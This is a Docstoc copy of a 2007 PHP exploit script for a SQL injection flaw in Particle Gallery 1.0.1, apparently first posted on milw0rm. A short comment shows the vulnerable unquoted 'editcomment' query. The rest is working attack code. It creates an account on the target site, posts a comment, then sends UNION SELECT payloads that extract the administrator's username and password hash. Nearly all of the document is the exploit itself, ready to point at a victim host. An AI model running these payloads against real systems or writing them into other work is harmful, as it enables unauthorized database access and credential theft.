Docstoc

Particle Gallery 1.0.1 Remote SQL Injection Exploit

Document Sample
Particle Gallery 1.0.1 Remote SQL Injection Exploit Powered By Docstoc
					                               Particle Gallery 1.0.1 Remote SQL Injection Exploit                                 Page 1/7
   1    #!/usr/bin/php −q −d short_open_tag=on
   2    <?php
   3
   4    /*
   5
   6    Explanation:
   7
   8    Function dbSecure(functions.php):
   9
   10   function dbSecure($code){
   11
   12          if (get_magic_quotes_gpc()) {
   13             $code = stripslashes($code);
   14          }
   15
   16          if (function_exists("mysql_real_escape_string")){
   17                   $code = mysql_real_escape_string($code);
   18          } elseif (function_exists("mysql_escape_string")){
   19                   $code = mysql_escape_string($code);
   20          } else {
   21                   $code = addslashes($code);
   22          }
   23
   24          return $code;
   25   }
   26
   27
   28   Excellent function for SQL input validation, yet we don’t even need this function here as we don’t
   29   need to add any quotes...haha!
   30
   31
   32   Vulnerable Code(viewimage.php):
   33
   34   $t−>set_var("COMMENT_ID", "");
   35   if ($_GET["editcomment"] <> ""){
   36           $sql = "SELECT * FROM " . $dbprefix . "comments WHERE commentid = " . dbSecure($_GET["editcomment"]);
   37           $cme = $db−>execute($sql);
   38           if ($usr−>Access > 1 || ($_SESSION["userid"] == $cme−>fields["userid"])){
   39                   // allow user to edit the comment
   40                   $t−>set_var("COMMENTS_TYPE", "Edit");
   41                   $t−>set_var("COMMENT_ID", $cme−>fields["commentid"]);
   42                   $t−>set_var("COMMENTS_FORM", $core . "&amp;commentspage=" . $page);
   43                   if ($_POST["comments"] <> ""){
   44                            $t−>set_var("COMMENTS_TEXT", un($_POST["comments"]));
   45                   } else {
   46                            $t−>set_var("COMMENTS_TEXT", $cme−>fields["comments"]);
   47                   }
   48           }
   49
   50
   51   ...classic!
   52

Silentz                                                                                                             06/01/2007
                                   Particle Gallery 1.0.1 Remote SQL Injection Exploit             Page 2/7
   53   */
   54
   55   error_reporting(0);
   56   ini_set("max_execution_time",0);
   57   ini_set("default_socket_timeout",5);
   58
   59   if ($argc<3) {
   60   print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\r\n";
   61   print "        Particle Gallery <= 1.0.1 SQL Injection Exploit\r\n";
   62   print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\r\n";
   63   print "Usage: w4ck1ng_pg.php [HOST] [PATH]\r\n\r\n";
   64   print "[HOST]        = Target server’s hostname or ip address\r\n";
   65   print "[PATH]        = Path where Particle Gallery is located\r\n";
   66   print "e.g. w4ck1ng_pg.php 0 victim.com /pg/\r\n";
   67   print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\r\n";
   68   print "                                     http://www.w4ck1ng.com\r\n";
   69   print "                                          ...Silentz\r\n";
   70   print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\r\n";
   71   die;
   72   }
   73
   74   function footer(){
   75
   76   print   "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\r\n";
   77   print   "                           http://www.w4ck1ng.com\r\n";
   78   print   "                                ...Silentz\r\n";
   79   print   "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\r\n";
   80
   81   }
   82
   83   //Props to rgod for the following functions
   84
   85   $proxy_regex = ’(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)’;
   86   function sendpacketii($packet)
   87   {
   88     global $proxy, $host, $port, $html, $proxy_regex;
   89     if ($proxy==’’) {
   90       $ock=fsockopen(gethostbyname($host),$port);
   91       if (!$ock) {
   92          echo ’No response from ’.$host.’:’.$port; die;
   93       }
   94     }
   95     else {
   96            $c = preg_match($proxy_regex,$proxy);
   97       if (!$c) {
   98          echo ’Not a valid proxy...’;die;
   99       }
  100       $parts=explode(’:’,$proxy);
  101       echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
  102       $ock=fsockopen($parts[0],$parts[1]);
  103       if (!$ock) {
  104          echo ’No response from proxy...’;die;
Silentz                                                                                            06/01/2007
                                Particle Gallery 1.0.1 Remote SQL Injection Exploit                     Page 3/7
  105             }
  106       }
  107       fputs($ock,$packet);
  108       if ($proxy==’’) {
  109         $html=’’;
  110         while (!feof($ock)) {
  111           $html.=fgets($ock);
  112         }
  113       }
  114       else {
  115         $html=’’;
  116         while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
  117           $html.=fread($ock,1);
  118         }
  119       }
  120       fclose($ock);
  121   }
  122
  123   function make_seed()
  124   {
  125      list($usec, $sec) = explode(’ ’, microtime());
  126      return (float) $sec + ((float) $usec * 100000);
  127   }
  128
  129   $host = $argv[1];
  130   $path = $argv[2];
  131   $port=80;
  132   $proxy="";
  133
  134   for ($i=4; $i<=$argc−1; $i++){
  135   $temp=$argv[$i][0].$argv[$i][1];
  136   if (($temp<>"−p") and ($temp<>"−P"))
  137   {
  138   $cmd.=" ".$argv[$i];
  139   }
  140   if ($temp=="−p")
  141   {
  142      $port=str_replace("−p","",$argv[$i]);
  143   }
  144   if ($temp=="−P")
  145   {
  146      $proxy=str_replace("−P","",$argv[$i]);
  147   }
  148   }
  149
  150   if (($path[0]<>’/’) or ($path[strlen($path)−1]<>’/’)) {echo ’Error... check the path!’; die;}
  151   if ($proxy==’’) {$p=$path;} else {$p=’http://’.$host.’:’.$port.$path;}
  152
  153
  154   print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\r\n";
  155   print "      Particle Gallery <= 1.0.1 SQL Injection Exploit\r\n";
  156   print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\r\n";
Silentz                                                                                                 06/01/2007
                                   Particle Gallery 1.0.1 Remote SQL Injection Exploit                                                  Page 4/7
  157
  158     echo "\r\n[+] Checking if user exists...";
  159
  160     $data="username=w4ck1ng";
  161     $data.="&password=w4ck1ng";
  162     $data.="&from=";
  163     $packet ="POST " . $p . "auth.php?do=signin HTTP/1.1\r\n";
  164     $packet.="Content−Type: application/x−www−form−urlencoded\r\n";
  165     $packet.="Host: ".$host."\r\n";
  166     $packet.="Content−Length: ".strlen($data)."\r\n";
  167     $packet.="Connection: Close\r\n\r\n";
  168     $packet.=$data;
  169
  170     sendpacketii($packet);
  171
  172     if (strstr($html,"User Control Panel")){echo "...Yep!\r\n";}
  173     else{echo "...Nope!";
  174
  175     echo "\r\n[+] Registering...";
  176
  177     $data="rusername=w4ck1ng";
  178     $data.="&password=w4ck1ng";
  179     $data.="&password2=w4ck1ng";
  180     $data.="&email=w4ck1ng%40www.com";
  181     $data.="&do=register";
  182     $packet ="POST " . $p . "auth.php?page=register HTTP/1.1\r\n";
  183     $packet.="Content−Type: application/x−www−form−urlencoded\r\n";
  184     $packet.="Host: ".$host."\r\n";
  185     $packet.="Content−Length: ".strlen($data)."\r\n";
  186     $packet.="Connection: Close\r\n\r\n";
  187     $packet.=$data;
  188
  189     sendpacketii($packet);
  190
  191     $temp=explode("Set−Cookie: ",$html);
  192     $temp2=explode(" ",$temp[1]);
  193     $cookie=$temp2[0];
  194
  195     if (strstr($html,"Location: index.php?act=newbie")){echo "...Successful!\r\n";}
  196     if (strstr($html,"Registrations are not currently being accepted.")){echo "...Registration Disabled!\r\n"; footer(); exit;}
  197     else{} }
  198
  199     echo "[+] Signing In...";
  200
  201     $data="username=w4ck1ng";
  202     $data.="&password=w4ck1ng";
  203     $data.="&from=";
  204     $packet ="POST " . $p . "auth.php?do=signin HTTP/1.1\r\n";
  205     $packet.="Content−Type: application/x−www−form−urlencoded\r\n";
  206     $packet.="Host: ".$host."\r\n";
  207     $packet.="Content−Length: ".strlen($data)."\r\n";
  208     $packet.="Connection: Close\r\n\r\n";
Silentz                                                                                                                                 06/01/2007
                                   Particle Gallery 1.0.1 Remote SQL Injection Exploit                                                  Page 5/7
  209       $packet.=$data;
  210
  211       sendpacketii($packet);
  212
  213       $temp=explode("Set−Cookie: ",$html);
  214       $temp2=explode(" ",$temp[1]);
  215       $cookie=$temp2[0];
  216
  217       if (strstr($html,"Welcome to your account control panel")){echo "...Successful!";}
  218       else{die("...Failed!\r\n"); footer(); exit;}
  219
  220       $packet ="GET " . $p . " HTTP/1.1\r\n";
  221       $packet.="Host: " . $host . "\r\n";
  222       $packet.="Cookie: " . $cookie . "\r\n";
  223       $packet.="Connection: Close\r\n\r\n";
  224       sendpacketii($packet);
  225
  226            if (strstr($html,"<td style=\"text−align: right;\"><a href=\"viewimage.php?imageid=")){
  227
  228                      $temp=explode("<td style=\"text−align: right;\"><a href=\"viewimage.php?imageid=",$html);
  229                      $temp2=explode("\">",$temp[1]);
  230                      $imageid=$temp2[0];
  231
  232                      echo "\r\n[+] Image ID Retrieved..." . $imageid . "!\n";}
  233
  234            else{echo "\r\n[−] Cannot retrieve a valid image ID...\n"; footer(); exit;}
  235
  236
  237       $data="comments=Your+about+to+get+owned%21";
  238       $data.="&do=comment";
  239       $data.="&commentid=";
  240       $packet ="POST " . $p . "viewimage.php?imageid=" . $imageid . " HTTP/1.1\r\n";
  241       $packet.="Content−Type: application/x−www−form−urlencoded\r\n";
  242       $packet.="Host: ".$host."\r\n";
  243       $packet.="Content−Length: ".strlen($data)."\r\n";
  244       $packet.="Cookie: " . $cookie . "\r\n";
  245       $packet.="Connection: Close\r\n\r\n";
  246       $packet.=$data;
  247
  248       sendpacketii($packet);
  249
  250       if (strstr($html,"Comments posted successfully!")){echo "[+] Posting comment...Done!\n";}
  251       else{echo "[−] Posting comment...Failed!\n"; footer(); exit;}
  252
  253        $sqlArray = array(
  254   "viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,54),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101
        ),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/
        FROM/**/pg_users/**/where/**/userid=14/*",
  255   "viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,55),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101
        ),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/
        FROM/**/pg_users/**/where/**/userid=14/*",
  256   "viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,56),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101
Silentz                                                                                                                                 06/01/2007
                                  Particle Gallery 1.0.1 Remote SQL Injection Exploit                                                   Page 6/7
        ),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/
        FROM/**/pg_users/**/where/**/userid=14/*",
  257   "viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,57),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101
        ),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/
        FROM/**/pg_users/**/where/**/userid=14/*",
  258   "viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,48),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101
        ),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/
        FROM/**/pg_users/**/where/**/userid=14/*",
  259   "viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,49),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101
        ),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/
        FROM/**/pg_users/**/where/**/userid=14/*",
  260   "viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,50),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101
        ),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/
        FROM/**/pg_users/**/where/**/userid=14/*",
  261   "viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,51),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101
        ),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/
        FROM/**/pg_users/**/where/**/userid=14/*"
  262   );
  263
  264   for ($i=0; $i<=count($sqlArray); $i++){
  265
  266       $packet ="GET " . $p . $sqlArray[$i] . " HTTP/1.1\r\n";
  267       $packet.="Host: " . $host . "\r\n";
  268       $packet.="Cookie: " . $cookie . "\r\n";
  269       $packet.="Connection: Close\r\n\r\n";
  270       sendpacketii($packet);
  271
  272       if (strstr($html,"name=\"comments\">Username=")){
  273                   $temp3=explode("id=\"comments\" name=\"comments\">Username=",$html);
  274                   $temp4=explode(":",$temp3[1]);
  275                   $ret_user=$temp4[0];
  276
  277                      echo "\r\n[+] Admin User: " . $ret_user;}
  278
  279
  280           elseif (strstr($html,"404")){
  281                           echo "\r\n[−] Image ID is not valid, please try another!"; footer(); exit;}
  282       else{}
  283   }
  284
  285        $sqlArray = array(
  286   "viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,54),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101
        ),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/
        FROM/**/pg_users/**/where/**/userid=14/*",
  287   "viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,55),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101
        ),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/
        FROM/**/pg_users/**/where/**/userid=14/*",
  288   "viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,56),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101
        ),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/
        FROM/**/pg_users/**/where/**/userid=14/*",
  289   "viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,57),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101
        ),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/
Silentz                                                                                                                                 06/01/2007
                                  Particle Gallery 1.0.1 Remote SQL Injection Exploit                                                   Page 7/7
        FROM/**/pg_users/**/where/**/userid=14/*",
  290   "viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,48),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101
        ),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/
        FROM/**/pg_users/**/where/**/userid=14/*",
  291   "viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,49),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101
        ),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/
        FROM/**/pg_users/**/where/**/userid=14/*",
  292   "viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,50),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101
        ),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/
        FROM/**/pg_users/**/where/**/userid=14/*",
  293   "viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,51),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101
        ),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/
        FROM/**/pg_users/**/where/**/userid=14/*"
  294   );
  295
  296   for ($i=0; $i<=count($sqlArray); $i++){
  297
  298        $packet ="GET " . $p . $sqlArray[$i] . " HTTP/1.1\r\n";
  299        $packet.="Host: " . $host . "\r\n";
  300        $packet.="Cookie: " . $cookie . "\r\n";
  301        $packet.="Connection: Close\r\n\r\n";
  302        sendpacketii($packet);
  303
  304        if (strstr($html,":Hash=")){
  305                    $temp3=explode("Hash=",$html);
  306                    $temp4=explode("</textarea>",$temp3[1]);
  307                    $ret_hash=$temp4[0];
  308
  309                      echo "\r\n[+] Admin User: " . $ret_hash . "\n";}
  310        else{}
  311   }
  312
  313   footer();
  314
  315   ?>
  316
  317   # milw0rm.com [2007−06−01]




Silentz                                                                                                                                 06/01/2007

				
DOCUMENT INFO